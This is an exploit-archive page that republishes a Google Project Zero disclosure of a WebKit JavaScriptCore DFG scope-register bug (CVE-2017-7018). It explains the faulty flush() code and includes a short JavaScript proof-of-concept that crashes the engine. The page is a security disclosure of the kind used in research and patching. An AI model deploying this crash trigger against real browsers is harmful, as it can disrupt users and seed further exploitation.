[] NeoSense
E X P L O I T S
title author type platform port cve id

WebKit JSC - 'DFG::ByteCodeParser::flush(InlineStackEntry* inlineStackEntry)' Incorrect Scope Register Handling

Author: Google Security Research
type: dos
platform: multiple
port: 
date_added: 2017-07-25 
date_updated: 2017-07-25 
verified: 1 
codes: CVE-2017-7018 
tags: 
aliases:  
screenshot_url:  
application_url: 
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1234

Here's a snippet of DFG::ByteCodeParser::flush(InlineStackEntry* inlineStackEntry).

void flush(InlineStackEntry* inlineStackEntry)
{
	...
    if (m_graph.needsScopeRegister())
        flush(m_codeBlock->scopeRegister()); <<--- (a)
}

At (a), it should flush the scope register of |inlineStackEntry->m_codeBlock| instead of |m_codeBlock|. But it doesn't. As a result, the scope register of |inlineStackEntry->m_codeBlock| may have an incorrect offset in the stack layout phase.

PoC:
-->

function f() {
    (function () {
    	eval('1');
    	f();
    }());

    throw 1;
}

f();
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.